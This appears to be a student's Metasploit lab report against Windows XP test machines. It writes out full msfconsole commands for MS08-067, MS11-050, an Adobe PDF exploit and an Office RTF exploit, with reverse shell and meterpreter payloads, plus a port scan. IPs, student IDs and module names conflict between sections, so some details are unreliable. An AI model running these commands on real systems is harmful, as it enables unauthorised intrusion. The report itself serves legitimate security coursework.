网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

时间:2023-12-11 22:10:20

1.实践内容(3.5分)

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。


1.1一个主动攻击实践,如ms08_067; (1分)

MS08-067漏洞攻击

这次使用Metaploit框架中的MS08_067渗透攻击模块对windows XP SP3(English)(没有使用DEF和ASLR安全防护机制)靶机进行渗透测试。

  • 攻击机:kali
  • 靶机:windows XP SP3(English)

指令如下所示:

msfconsole
search ms08_067
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set LHOST 192.168.46.132 //攻击机IP
set LPORT 5215 //设置端口号
set RHOST 192.168.46.133 //靶机IP
set target 0 //自动选择目标系统类型,匹配度较高
exploit

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

连接成功:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

可以看到下图中“192.168.46.133”即靶机的IP地址,所以攻击成功:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用


1.2 一个针对浏览器的攻击,如ms11_050;(1分)

浏览器渗透攻击——MS11-050

  • 攻击机:kali
  • 靶机:WindowsXP Professional sp2

输入如下指令,首先进入控制台:

msfconsole
use windows/browser/ms11_050_mshtml_cobjectelement
set payload generic/shell_reverse_tcp
set LHOST 192.168.46.132
set LPORT 5215
set URIPATH 20155215
exploit

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

访问http://192.168.130.130:8080/2015d,网页出现如下的内容:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

连接成功:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用


1.3 一个针对客户端的攻击,如Adobe,Office;(1分)

A.针对Adobe Reader软件的渗透攻击——adobe_toolbutton

  • 攻击机:kali
  • 靶机:windowsXP Professional sp2
  • Adobe版本:9.3
> use windows/fileformat/adobe_cooltype_sing
> set payload windows/meterpreter/reverse_tcp //tcp反向回连
> set LHOST 192.168.130.130 //攻击机ip
> set LPORT 5303 //攻击端口
> set FILENAME 20155303-2.pdf //设置生成pdf文件的名字
> exploit //攻击

生成了名为“20155215”的PDF文件:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

将生成的pdf文件拷贝到靶机上。

在kali上输入back退出当前模块,进入监听模块,输入以下命令:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

图中的“192.168.46.134”即为靶机的IP地址,也就是说攻击成功:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

B.针对Office软件的渗透攻击——MS10-087

  • 攻击机:kali
  • 靶机:windowsXP Professional sp2
  • Office版本:2003
msfconsole
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set payload windows/exec
set CMD calc.exe
exploit

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

使用show options命令查看一些参数值,比如文件名、绑定程序等等。

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

将生成的文件从/root/.msf4/local/msf.rft拷贝到靶机上,并使用Office2003打开。

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

不管第几次打开,都会提示错误:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

然后我们可以看到计算器自动打开了,攻击成功:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用


1.4 成功应用任何一个辅助模块。(0.5分)

我用的是auxiliary/scanner/portscan/tcp

指令如下所示:

show auxiliary
use auxiliary/scanner/portscan/tcp
show options
set RHOSTS 192.168.46.135
set THREADS 15
exploit

show auxiliary 之后出现下面的各种辅助模块,我选的就是红框框出的:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

show options可以让我们查看有哪些参数项:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

设置相关参数如下:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

连接成功,可以看到TCP端口开放:

网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用


2.1.基础问题回答

用自己的话解释什么是exploit,payload,encode.

答:

  • exploit是攻击模块,工作原理就是利用发现的安全漏洞对目标系统进行攻击,植入并运行攻击载荷,从而获得对远程目标系统访问权的。
  • payload payload,即载荷,应该是指在程序中起关键作用的代码,通常作为攻击者打开会话连接的有效载荷,用于渗透攻击等。
  • encode指的是可以对一段代码进行编码,改变其代码特征,但是不改变其本质。

2.2.实践总结与体会

这次的实验乍一看感觉有点复杂,真的去做了之后觉得还行。主要是因为我们是“站在巨人的肩膀”上,是以已知的方式攻击已经被发现的漏洞,所以就感觉不会太困难的。但是做最后一个任意模块的时候,就需要自己动脑筋啦,因为要跟别人不一样,所以我还是花了一点心思,感觉还是很有收获的。